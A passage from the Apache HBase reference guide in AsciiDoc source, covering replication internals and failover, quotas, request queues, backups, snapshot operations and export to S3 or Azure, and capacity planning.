link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-10322[HBASE-10322].\n\n==== Replication Internals\n\nReplication State in ZooKeeper::\n HBase replication maintains its state in ZooKeeper.\n By default, the state is contained in the base node _\/hbase\/replication_.\n This node contains two child nodes, the `Peers` znode and the `RS` znode.\n\nThe `Peers` Znode::\n The `peers` znode is stored in _\/hbase\/replication\/peers_ by default.\n It consists of a list of all peer replication clusters, along with the status of each of them.\n The value of each peer is its cluster key, which is provided in the HBase Shell.\n The cluster key contains a list of ZooKeeper nodes in the cluster's quorum, the client port for the ZooKeeper quorum, and the base znode for HBase in HDFS on that cluster.\n\nThe `RS` Znode::\n The `rs` znode contains a list of WAL logs which need to be replicated.\n This list is divided into a set of queues organized by region server and the peer cluster the region server is shipping the logs to.\n The rs znode has one child znode for each region server in the cluster.\n The child znode name is the region server's hostname, client port, and start code.\n This list includes both live and dead region servers.\n\n==== Choosing Region Servers to Replicate To\n\nWhen a master cluster region server initiates a replication source to a slave cluster, it first connects to the slave's ZooKeeper ensemble using the provided cluster key . It then scans the _rs\/_ directory to discover all the available sinks (region servers that are accepting incoming streams of edits to replicate) and randomly chooses a subset of them using a configured ratio which has a default value of 10%. For example, if a slave cluster has 150 machines, 15 will be chosen as potential recipient for edits that this master cluster region server sends.\nBecause this selection is performed by each master region server, the probability that all slave region servers are used is very high, and this method works for clusters of any size.\nFor example, a master cluster of 10 machines replicating to a slave cluster of 5 machines with a ratio of 10% causes the master cluster region servers to choose one machine each at random.\n\nA ZooKeeper watcher is placed on the _${zookeeper.znode.parent}\/rs_ node of the slave cluster by each of the master cluster's region servers.\nThis watch is used to monitor changes in the composition of the slave cluster.\nWhen nodes are removed from the slave cluster, or if nodes go down or come back up, the master cluster's region servers will respond by selecting a new pool of slave region servers to replicate to.\n\n==== Keeping Track of Logs\n\nEach master cluster region server has its own znode in the replication znodes hierarchy.\nIt contains one znode per peer cluster (if 5 slave clusters, 5 znodes are created), and each of these contain a queue of WALs to process.\nEach of these queues will track the WALs created by that region server, but they can differ in size.\nFor example, if one slave cluster becomes unavailable for some time, the WALs should not be deleted, so they need to stay in the queue while the others are processed.\nSee <<rs.failover.details,rs.failover.details>> for an example.\n\nWhen a source is instantiated, it contains the current WAL that the region server is writing to.\nDuring log rolling, the new file is added to the queue of each slave cluster's znode just before it is made available.\nThis ensures that all the sources are aware that a new log exists before the region server is able to append edits into it, but this operations is now more expensive.\nThe queue items are discarded when the replication thread cannot read more entries from a file (because it reached the end of the last block) and there are other files in the queue.\nThis means that if a source is up to date and replicates from the log that the region server writes to, reading up to the \"end\" of the current file will not delete the item in the queue.\n\nA log can be archived if it is no longer used or if the number of logs exceeds `hbase.regionserver.maxlogs` because the insertion rate is faster than regions are flushed.\nWhen a log is archived, the source threads are notified that the path for that log changed.\nIf a particular source has already finished with an archived log, it will just ignore the message.\nIf the log is in the queue, the path will be updated in memory.\nIf the log is currently being replicated, the change will be done atomically so that the reader doesn't attempt to open the file when has already been moved.\nBecause moving a file is a NameNode operation , if the reader is currently reading the log, it won't generate any exception.\n\n==== Reading, Filtering and Sending Edits\n\nBy default, a source attempts to read from a WAL and ship log entries to a sink as quickly as possible.\nSpeed is limited by the filtering of log entries Only KeyValues that are scoped GLOBAL and that do not belong to catalog tables will be retained.\nSpeed is also limited by total size of the list of edits to replicate per slave, which is limited to 64 MB by default.\nWith this configuration, a master cluster region server with three slaves would use at most 192 MB to store data to replicate.\nThis does not account for the data which was filtered but not garbage collected.\n\nOnce the maximum size of edits has been buffered or the reader reaches the end of the WAL, the source thread stops reading and chooses at random a sink to replicate to (from the list that was generated by keeping only a subset of slave region servers). It directly issues a RPC to the chosen region server and waits for the method to return.\nIf the RPC was successful, the source determines whether the current file has been emptied or it contains more data which needs to be read.\nIf the file has been emptied, the source deletes the znode in the queue.\nOtherwise, it registers the new offset in the log's znode.\nIf the RPC threw an exception, the source will retry 10 times before trying to find a different sink.\n\n==== Cleaning Logs\n\nIf replication is not enabled, the master's log-cleaning thread deletes old logs using a configured TTL.\nThis TTL-based method does not work well with replication, because archived logs which have exceeded their TTL may still be in a queue.\nThe default behavior is augmented so that if a log is past its TTL, the cleaning thread looks up every queue until it finds the log, while caching queues it has found.\nIf the log is not found in any queues, the log will be deleted.\nThe next time the cleaning process needs to look for a log, it starts by using its cached list.\n\nNOTE: WALs are saved when replication is enabled or disabled as long as peers exist.\n\n[[rs.failover.details]]\n==== Region Server Failover\n\nWhen no region servers are failing, keeping track of the logs in ZooKeeper adds no value.\nUnfortunately, region servers do fail, and since ZooKeeper is highly available, it is useful for managing the transfer of the queues in the event of a failure.\n\nEach of the master cluster region servers keeps a watcher on every other region server, in order to be notified when one dies (just as the master does). When a failure happens, they all race to create a znode called `lock` inside the dead region server's znode that contains its queues.\nThe region server that creates it successfully then transfers all the queues to its own znode, one at a time since ZooKeeper does not support renaming queues.\nAfter queues are all transferred, they are deleted from the old location.\nThe znodes that were recovered are renamed with the ID of the slave cluster appended with the name of the dead server.\n\nNext, the master cluster region server creates one new source thread per copied queue, and each of the source threads follows the read\/filter\/ship pattern.\nThe main difference is that those queues will never receive new data, since they do not belong to their new region server.\nWhen the reader hits the end of the last log, the queue's znode is deleted and the master cluster region server closes that replication source.\n\nGiven a master cluster with 3 region servers replicating to a single slave with id `2`, the following hierarchy represents what the znodes layout could be at some point in time.\nThe region servers' znodes all contain a `peers` znode which contains a single queue.\nThe znode names in the queues represent the actual file names on HDFS in the form `address,port.timestamp`.\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020, 123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n----\n\nAssume that 1.1.1.2 loses its ZooKeeper session.\nThe survivors will race to create a lock, and, arbitrarily, 1.1.1.3 wins.\nIt will then start transferring all the queues to its local peers znode by appending the name of the dead server.\nRight before 1.1.1.3 is able to clean up the old znodes, the layout will look like the following:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n lock\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020,123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n----\n\nSome time later, but before 1.1.1.3 is able to finish replicating the last WAL from 1.1.1.2, it dies too.\nSome new logs were also created in the normal queues.\nThe last region server will then try to lock 1.1.1.3's znode and will begin transferring all the queues.\nThe new layout will be:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1378 (Contains a position)\n\n 2-1.1.1.3,60020,123456630\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790-1.1.1.3,60020,123456630\/\n 1.1.1.2,60020.1312 (Contains a position)\n 1.1.1.3,60020,123456630\/\n lock\n 2\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1312 (Contains a position)\n----\n\n=== Replication Metrics\n\nThe following metrics are exposed at the global region server level and (since HBase 0.95) at the peer level:\n\n`source.sizeOfLogQueue`::\n number of WALs to process (excludes the one which is being processed) at the Replication source\n\n`source.shippedOps`::\n number of mutations shipped\n\n`source.logEditsRead`::\n number of mutations read from WALs at the replication source\n\n`source.ageOfLastShippedOp`::\n age of last batch that was shipped by the replication source\n\n=== Replication Configuration Options\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| Option\n| Description\n| Default\n\n| zookeeper.znode.parent\n| The name of the base ZooKeeper znode used for HBase\n| \/hbase\n\n| zookeeper.znode.replication\n| The name of the base znode used for replication\n| replication\n\n| zookeeper.znode.replication.peers\n| The name of the peer znode\n| peers\n\n| zookeeper.znode.replication.peers.state\n| The name of peer-state znode\n| peer-state\n\n| zookeeper.znode.replication.rs\n| The name of the rs znode\n| rs\n\n| replication.sleep.before.failover\n| How many milliseconds a worker should sleep before attempting to replicate\n a dead region server's WAL queues.\n|\n\n| replication.executor.workers\n| The number of region servers a given region server should attempt to\n failover simultaneously.\n| 1\n|===\n\n=== Monitoring Replication Status\n\nYou can use the HBase Shell command `status 'replication'` to monitor the replication status on your cluster. The command has three variations:\n* `status 'replication'` -- prints the status of each source and its sinks, sorted by hostname.\n* `status 'replication', 'source'` -- prints the status for each replication source, sorted by hostname.\n* `status 'replication', 'sink'` -- prints the status for each replication sink, sorted by hostname.\n\n== Running Multiple Workloads On a Single Cluster\n\nHBase provides the following mechanisms for managing the performance of a cluster\nhandling multiple workloads:\n. <<quota>>\n. <<request_queues>>\n. <<multiple-typed-queues>>\n\n[[quota]]\n=== Quotas\nHBASE-11598 introduces quotas, which allow you to throttle requests based on\nthe following limits:\n\n. <<request-quotas,The number or size of requests(read, write, or read+write) in a given timeframe>>\n. <<namespace_quotas,The number of tables allowed in a namespace>>\n\nThese limits can be enforced for a specified user, table, or namespace.\n\n.Enabling Quotas\n\nQuotas are disabled by default. To enable the feature, set the `hbase.quota.enabled`\nproperty to `true` in _hbase-site.xml_ file for all cluster nodes.\n\n.General Quota Syntax\n. THROTTLE_TYPE can be expressed as READ, WRITE, or the default type(read + write).\n. Timeframes can be expressed in the following units: `sec`, `min`, `hour`, `day`\n. Request sizes can be expressed in the following units: `B` (bytes), `K` (kilobytes),\n`M` (megabytes), `G` (gigabytes), `T` (terabytes), `P` (petabytes)\n. Numbers of requests are expressed as an integer followed by the string `req`\n. Limits relating to time are expressed as req\/time or size\/time. For instance `10req\/day`\nor `100P\/hour`.\n. Numbers of tables or regions are expressed as integers.\n\n[[request-quotas]]\n.Setting Request Quotas\nYou can set quota rules ahead of time, or you can change the throttle at runtime. The change\nwill propagate after the quota refresh period has expired. This expiration period\ndefaults to 5 minutes. To change it, modify the `hbase.quota.refresh.period` property\nin `hbase-site.xml`. This property is expressed in milliseconds and defaults to `300000`.\n\n----\n# Limit user u1 to 10 requests per second\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 read requests per second\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 M per day everywhere\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10M\/day'\n\n# Limit user u1 to 10 M write size per sec\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => WRITE, USER => 'u1', LIMIT => '10M\/sec'\n\n# Limit user u1 to 5k per minute on table t2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', TABLE => 't2', LIMIT => '5K\/min'\n\n# Limit user u1 to 10 read requests per sec on table t2\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', TABLE => 't2', LIMIT => '10req\/sec'\n\n# Remove an existing limit from user u1 on namespace ns2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', NAMESPACE => 'ns2', LIMIT => NONE\n\n# Limit all users to 10 requests per hour on namespace ns1\nhbase> set_quota TYPE => THROTTLE, NAMESPACE => 'ns1', LIMIT => '10req\/hour'\n\n# Limit all users to 10 T per hour on table t1\nhbase> set_quota TYPE => THROTTLE, TABLE => 't1', LIMIT => '10T\/hour'\n\n# Remove all existing limits from user u1\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => NONE\n\n# List all quotas for user u1 in namespace ns2\nhbase> list_quotas USER => 'u1, NAMESPACE => 'ns2'\n\n# List all quotas for namespace ns2\nhbase> list_quotas NAMESPACE => 'ns2'\n\n# List all quotas for table t1\nhbase> list_quotas TABLE => 't1'\n\n# list all quotas\nhbase> list_quotas\n----\n\nYou can also place a global limit and exclude a user or a table from the limit by applying the\n`GLOBAL_BYPASS` property.\n----\nhbase> set_quota NAMESPACE => 'ns1', LIMIT => '100req\/min' # a per-namespace request limit\nhbase> set_quota USER => 'u1', GLOBAL_BYPASS => true # user u1 is not affected by the limit\n----\n\n[[namespace_quotas]]\n.Setting Namespace Quotas\n\nYou can specify the maximum number of tables or regions allowed in a given namespace, either\nwhen you create the namespace or by altering an existing namespace, by setting the\n`hbase.namespace.quota.maxtables property` on the namespace.\n\n.Limiting Tables Per Namespace\n----\n# Create a namespace with a max of 5 tables\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxtables'=>'5'}\n\n# Alter an existing namespace to have a max of 8 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxtables'=>'8'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns2'\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=>'hbase.namespace.quota.maxtables'}\n----\n\n.Limiting Regions Per Namespace\n----\n# Create a namespace with a max of 10 regions\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxregions'=>'10'\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns1'\n\n# Alter an existing namespace to have a max of 20 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxregions'=>'20'}\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=> 'hbase.namespace.quota.maxregions'}\n----\n\n[[request_queues]]\n=== Request Queues\nIf no throttling policy is configured, when the RegionServer receives multiple requests,\nthey are now placed into a queue waiting for a free execution slot (HBASE-6721).\nThe simplest queue is a FIFO queue, where each request waits for all previous requests in the queue\nto finish before running. Fast or interactive queries can get stuck behind large requests.\n\nIf you are able to guess how long a request will take, you can reorder requests by\npushing the long requests to the end of the queue and allowing short requests to preempt\nthem. Eventually, you must still execute the large requests and prioritize the new\nrequests behind them. The short requests will be newer, so the result is not terrible,\nbut still suboptimal compared to a mechanism which allows large requests to be split\ninto multiple smaller ones.\n\nHBASE-10993 introduces such a system for deprioritizing long-running scanners. There\nare two types of queues, `fifo` and `deadline`. To configure the type of queue used,\nconfigure the `hbase.ipc.server.callqueue.type` property in `hbase-site.xml`. There\nis no way to estimate how long each request may take, so de-prioritization only affects\nscans, and is based on the number of \u201cnext\u201d calls a scan request has made. An assumption\nis made that when you are doing a full table scan, your job is not likely to be interactive,\nso if there are concurrent requests, you can delay long-running scans up to a limit tunable by\nsetting the `hbase.ipc.server.queue.max.call.delay` property. The slope of the delay is calculated\nby a simple square root of `(numNextCall * weight)` where the weight is\nconfigurable by setting the `hbase.ipc.server.scan.vtime.weight` property.\n\n[[multiple-typed-queues]]\n=== Multiple-Typed Queues\n\nYou can also prioritize or deprioritize different kinds of requests by configuring\na specified number of dedicated handlers and queues. You can segregate the scan requests\nin a single queue with a single handler, and all the other available queues can service\nshort `Get` requests.\n\nYou can adjust the IPC queues and handlers based on the type of workload, using static\ntuning options. This approach is an interim first step that will eventually allow\nyou to change the settings at runtime, and to dynamically adjust values based on the load.\n\n.Multiple Queues\n\nTo avoid contention and separate different kinds of requests, configure the\n`hbase.ipc.server.callqueue.handler.factor` property, which allows you to increase the number of\nqueues and control how many handlers can share the same queue., allows admins to increase the number\nof queues and decide how many handlers share the same queue.\n\nUsing more queues reduces contention when adding a task to a queue or selecting it\nfrom a queue. You can even configure one queue per handler. The trade-off is that\nif some queues contain long-running tasks, a handler may need to wait to execute from that queue\nrather than stealing from another queue which has waiting tasks.\n\n.Read and Write Queues\nWith multiple queues, you can now divide read and write requests, giving more priority\n(more queues) to one or the other type. Use the `hbase.ipc.server.callqueue.read.ratio`\nproperty to choose to serve more reads or more writes.\n\n.Get and Scan Queues\nSimilar to the read\/write split, you can split gets and scans by tuning the `hbase.ipc.server.callqueue.scan.ratio`\nproperty to give more priority to gets or to scans. A scan ratio of `0.1` will give\nmore queue\/handlers to the incoming gets, which means that more gets can be processed\nat the same time and that fewer scans can be executed at the same time. A value of\n`0.9` will give more queue\/handlers to scans, so the number of scans executed will\nincrease and the number of gets will decrease.\n\n\n[[ops.backup]]\n== HBase Backup\n\nThere are two broad strategies for performing HBase backups: backing up with a full cluster shutdown, and backing up on a live cluster.\nEach approach has pros and cons.\n\nFor additional information, see link:http:\/\/blog.sematext.com\/2011\/03\/11\/hbase-backup-options\/[HBase Backup\n Options] over on the Sematext Blog.\n\n[[ops.backup.fullshutdown]]\n=== Full Shutdown Backup\n\nSome environments can tolerate a periodic full shutdown of their HBase cluster, for example if it is being used a back-end analytic capacity and not serving front-end web-pages.\nThe benefits are that the NameNode\/Master are RegionServers are down, so there is no chance of missing any in-flight changes to either StoreFiles or metadata.\nThe obvious con is that the cluster is down.\nThe steps include:\n\n[[ops.backup.fullshutdown.stop]]\n==== Stop HBase\n\n\n\n[[ops.backup.fullshutdown.distcp]]\n==== Distcp\n\nDistcp could be used to either copy the contents of the HBase directory in HDFS to either the same cluster in another directory, or to a different cluster.\n\nNote: Distcp works in this situation because the cluster is down and there are no in-flight edits to files.\nDistcp-ing of files in the HBase directory is not generally recommended on a live cluster.\n\n[[ops.backup.fullshutdown.restore]]\n==== Restore (if needed)\n\nThe backup of the hbase directory from HDFS is copied onto the 'real' hbase directory via distcp.\nThe act of copying these files creates new HDFS metadata, which is why a restore of the NameNode edits from the time of the HBase backup isn't required for this kind of restore, because it's a restore (via distcp) of a specific HDFS directory (i.e., the HBase part) not the entire HDFS file-system.\n\n[[ops.backup.live.replication]]\n=== Live Cluster Backup - Replication\n\nThis approach assumes that there is a second cluster.\nSee the HBase page on link:http:\/\/hbase.apache.org\/book.html#replication[replication] for more information.\n\n[[ops.backup.live.copytable]]\n=== Live Cluster Backup - CopyTable\n\nThe <<copy.table,copytable>> utility could either be used to copy data from one table to another on the same cluster, or to copy data to another table on another cluster.\n\nSince the cluster is up, there is a risk that edits could be missed in the copy process.\n\n[[ops.backup.live.export]]\n=== Live Cluster Backup - Export\n\nThe <<export,export>> approach dumps the content of a table to HDFS on the same cluster.\nTo restore the data, the <<import,import>> utility would be used.\n\nSince the cluster is up, there is a risk that edits could be missed in the export process.\n\n[[ops.snapshots]]\n== HBase Snapshots\n\nHBase Snapshots allow you to take a snapshot of a table without too much impact on Region Servers.\nSnapshot, Clone and restore operations don't involve data copying.\nAlso, Exporting the snapshot to another cluster doesn't have impact on the Region Servers.\n\nPrior to version 0.94.6, the only way to backup or to clone a table is to use CopyTable\/ExportTable, or to copy all the hfiles in HDFS after disabling the table.\nThe disadvantages of these methods are that you can degrade region server performance (Copy\/Export Table) or you need to disable the table, that means no reads or writes; and this is usually unacceptable.\n\n[[ops.snapshots.configuration]]\n=== Configuration\n\nTo turn on the snapshot support just set the `hbase.snapshot.enabled` property to true.\n(Snapshots are enabled by default in 0.95+ and off by default in 0.94.6+)\n\n[source,java]\n----\n\n <property>\n <name>hbase.snapshot.enabled<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n[[ops.snapshots.takeasnapshot]]\n=== Take a Snapshot\n\nYou can take a snapshot of a table regardless of whether it is enabled or disabled.\nThe snapshot operation doesn't involve any data copying.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> snapshot 'myTable', 'myTableSnapshot-122112'\n----\n\n.Take a Snapshot Without Flushing\nThe default behavior is to perform a flush of data in memory before the snapshot is taken.\nThis means that data in memory is included in the snapshot.\nIn most cases, this is the desired behavior.\nHowever, if your set-up can tolerate data in memory being excluded from the snapshot, you can use the `SKIP_FLUSH` option of the `snapshot` command to disable and flushing while taking the snapshot.\n\n----\nhbase> snapshot 'mytable', 'snapshot123', {SKIP_FLUSH => true}\n----\n\nWARNING: There is no way to determine or predict whether a very concurrent insert or update will be included in a given snapshot, whether flushing is enabled or disabled.\nA snapshot is only a representation of a table during a window of time.\nThe amount of time the snapshot operation will take to reach each Region Server may vary from a few seconds to a minute, depending on the resource load and speed of the hardware or network, among other factors.\nThere is also no way to know whether a given insert or update is in memory or has been flushed.\n\n[[ops.snapshots.list]]\n=== Listing Snapshots\n\nList all snapshots taken (by printing the names and relative information).\n\n----\n\n$ .\/bin\/hbase shell\nhbase> list_snapshots\n----\n\n[[ops.snapshots.delete]]\n=== Deleting Snapshots\n\nYou can remove a snapshot, and the files retained for that snapshot will be removed if no longer needed.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> delete_snapshot 'myTableSnapshot-122112'\n----\n\n[[ops.snapshots.clone]]\n=== Clone a table from snapshot\n\nFrom a snapshot you can create a new table (clone operation) with the same data that you had when the snapshot was taken.\nThe clone operation, doesn't involve data copies, and a change to the cloned table doesn't impact the snapshot or the original table.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> clone_snapshot 'myTableSnapshot-122112', 'myNewTestTable'\n----\n\n[[ops.snapshots.restore]]\n=== Restore a snapshot\n\nThe restore operation requires the table to be disabled, and the table will be restored to the state at the time when the snapshot was taken, changing both data and schema if required.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> disable 'myTable'\nhbase> restore_snapshot 'myTableSnapshot-122112'\n----\n\nNOTE: Since Replication works at log level and snapshots at file-system level, after a restore, the replicas will be in a different state from the master.\nIf you want to use restore, you need to stop replication and redo the bootstrap.\n\nIn case of partial data-loss due to misbehaving client, instead of a full restore that requires the table to be disabled, you can clone the table from the snapshot and use a Map-Reduce job to copy the data that you need, from the clone to the main one.\n\n[[ops.snapshots.acls]]\n=== Snapshots operations and ACLs\n\nIf you are using security with the AccessController Coprocessor (See <<hbase.accesscontrol.configuration,hbase.accesscontrol.configuration>>), only a global administrator can take, clone, or restore a snapshot, and these actions do not capture the ACL rights.\nThis means that restoring a table preserves the ACL rights of the existing table, while cloning a table creates a new table that has no ACL rights until the administrator adds them.\n\n[[ops.snapshots.export]]\n=== Export to another cluster\n\nThe ExportSnapshot tool copies all the data related to a snapshot (hfiles, logs, snapshot metadata) to another cluster.\nThe tool executes a Map-Reduce job, similar to distcp, to copy files between the two clusters, and since it works at file-system level the hbase cluster does not have to be online.\n\nTo copy a snapshot called MySnapshot to an HBase cluster srv2 (hdfs:\/\/\/srv2:8082\/hbase) using 16 mappers:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16\n----\n\n.Limiting Bandwidth Consumption\nYou can limit the bandwidth consumption when exporting a snapshot, by specifying the `-bandwidth` parameter, which expects an integer representing megabytes per second.\nThe following example limits the above example to 200 MB\/sec.\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16 -bandwidth 200\n----\n\n[[snapshots_s3]]\n=== Storing Snapshots in an Amazon S3 Bucket\n\nFor general information and limitations of using Amazon S3 storage with HBase, see\n<<amazon_s3_configuration>>. You can also store and retrieve snapshots from Amazon\nS3, using the following procedure.\n\nNOTE: You can also store snapshots in Microsoft Azure Blob Storage. See <<snapshots_azure>>.\n\n.Prerequisites\n- You must be using HBase 1.0 or higher and Hadoop 2.6.1 or higher, which is the first\nconfiguration that uses the Amazon AWS SDK.\n- You must use the `s3a:\/\/` protocol to connect to Amazon S3. The older `s3n:\/\/`\nand `s3:\/\/` protocols have various limitations and do not use the Amazon AWS SDK.\n- The `s3a:\/\/` URI must be configured and available on the server where you run\nthe commands to export and restore the snapshot.\n\nAfter you have fulfilled the prerequisites, take the snapshot like you normally would.\nAfterward, you can export it using the `org.apache.hadoop.hbase.snapshot.ExportSnapshot`\ncommand like the one below, substituting your own `s3a:\/\/` path in the `copy-from`\nor `copy-to` directive and substituting or modifying other options as required:\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot \\\n -copy-from hdfs:\/\/srv2:8082\/hbase \\\n -copy-to s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot\n -copy-from s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -copy-to hdfs:\/\/srv2:8082\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\nYou can also use the `org.apache.hadoop.hbase.snapshot.SnapshotInfo` utility with the `s3a:\/\/` path by including the\n`-remote-dir` option.\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.SnapshotInfo \\\n -remote-dir s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -list-snapshots\n----\n\n[[snapshots_azure]]\n== Storing Snapshots in Microsoft Azure Blob Storage\n\nYou can store snapshots in Microsoft Azure Blog Storage using the same techniques\nas in <<snapshots_s3>>.\n\n.Prerequisites\n- You must be using HBase 1.2 or higher with Hadoop 2.7.1 or\n higher. No version of HBase supports Hadoop 2.7.0.\n- Your hosts must be configured to be aware of the Azure blob storage filesystem.\n See http:\/\/hadoop.apache.org\/docs\/r2.7.1\/hadoop-azure\/index.html.\n\nAfter you meet the prerequisites, follow the instructions\nin <<snapshots_s3>>, replacingthe protocol specifier with `wasb:\/\/` or `wasbs:\/\/`.\n\n[[ops.capacity]]\n== Capacity Planning and Region Sizing\n\nThere are several considerations when planning the capacity for an HBase cluster and performing the initial configuration.\nStart with a solid understanding of how HBase handles data internally.\n\n[[ops.capacity.nodes]]\n=== Node count and hardware\/VM configuration\n\n[[ops.capacity.nodes.datasize]]\n==== Physical data size\n\nPhysical data size on disk is distinct from logical size of your data and is affected by the following:\n\n* Increased by HBase overhead\n+\n* See <<keyvalue,keyvalue>> and <<keysize,keysize>>.\n At least 24 bytes per key-value (cell), can be more.\n Small keys\/values means more relative overhead.\n* KeyValue instances are aggregated into blocks, which are indexed.\n Indexes also have to be stored.\n Blocksize is configurable on a per-ColumnFamily basis.\n See <<regions.arch,regions.arch>>.\n\n* Decreased by <<compression,compression>> and data block encoding, depending on data.\n See also link:http:\/\/search-hadoop.com\/m\/lL12B1PFVhp1[this thread].\n You might want to test what compression and encoding (if any) make sense for your data.\n* Increased by size of region server <<wal,wal>> (usually fixed and negligible - less than half of RS memory size, per RS).\n* Increased by HDFS replication - usually x3.\n\nAside from the disk space necessary to store the data, one RS may not be able to serve arbitrarily large amounts of data due to some practical limits on region count and size (see <<ops.capacity.regions,ops.capacity.regions>>).\n\n[[ops.capacity.nodes.throughput]]\n==== Read\/Write throughput\n\nNumber of nodes can also be driven by required throughput for reads and\/or writes.\nThe throughput one can get per node depends a lot on data (esp.\nkey\/value sizes) and request patterns, as well as node and system configuration.\nPlanning should be done for peak load if it is likely that the load would be the main driver of the increase of the node count.\nPerformanceEvaluation and <<ycsb,ycsb>> tools can be used to test single node or a test cluster.\n\nFor write, usually 5-15Mb\/s per RS can be expected, since every region server has only one active WAL.\nThere's no good estimate for reads, as it depends vastly on data, requests, and cache hit rate. <<perf.casestudy,perf.casestudy>> might be helpful.\n\n[[ops.capacity.nodes.gc]]\n==== JVM GC limitations\n\nRS cannot currently utilize very large heap due to cost of GC.\nThere's also no good way of running multiple RS-es per server (other than running several VMs per machine). Thus, ~20-24Gb or less memory dedicated to one RS is recommended.\nGC tuning is required for large heap sizes.\nSee <<gcpause,gcpause>>, <<trouble.log.gc,trouble.log.gc>> and elsewhere (TODO: where?)\n\n[[ops.capacity.regions]]\n=== Determining region count and size\n\nGenerally less regions makes for a smoother running cluster (you can always manually split the big regions later (if necessary) to spread the data, or request load, over the cluster); 20-200 regions per RS is a reasonable range.\nThe number of regions cannot be configured directly (unless you go for fully <<disable.splitting,disable.splitting>>); adjust the region size to achieve the target region size given table size.\n\nWhen configuring regions for multiple tables, note that most region settings can be set on a per-table basis via link:http:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/HTableDescriptor.html[HTableDescriptor], as well as shell commands.\nThese settings will override the ones in `hbase-site.xml`.\nThat is useful if your tables have different workloads\/use cases.\n\nAlso note that in the discussion of region sizes here, _HDFS replication factor is not (and should not be) taken into account, whereas\n other factors <<ops.capacity.nodes.datasize,ops.capacity.nodes.datasize>> should be._ So, if your data is compressed and replicated 3 ways by HDFS, \"9 Gb region\" means 9 Gb of compressed data.\nHDFS replication factor only affects your disk usage and is invisible to most HBase code.\n\n==== Viewing the Current Number of Regions\n\nYou can view the current number of regions for a given table using the HMaster UI.\nIn the [label]#Tables# section, the number of online regions for each table is listed in the [label]#Online Regions# column.\nThis total only includes the in-memory state and does not include disabled or offline regions.\nIf you do not want to use the HMaster UI, you can determine the number of regions by counting the number of subdirectories of the \/hbase\/<table>\/ subdirectories in HDFS, or by running the `bin\/hbase hbck` command.\nEach of these methods may return a slightly different number, depending on the status of each region.\n\n[[ops.capacity.regions.count]]\n==== Number of regions per RS - upper bound\n\nIn production scenarios, where you have a lot of data, you are normally concerned with the maximum number of regions you can have per server. <<too_many_regions,too many regions>> has technical discussion on the subject.\nBasically, the maximum number of regions is mostly determined by memstore memory usage.\nEach region has its own memstores; these grow up to a configurable size; usually in 128-256 MB range, see <<hbase.hregion.memstore.flush.size,hbase.hregion.memstore.flush.size>>.\nOne memstore exists per column family (so there's only one per region if there's one CF in the table). The RS dedicates some fraction of total memory to its 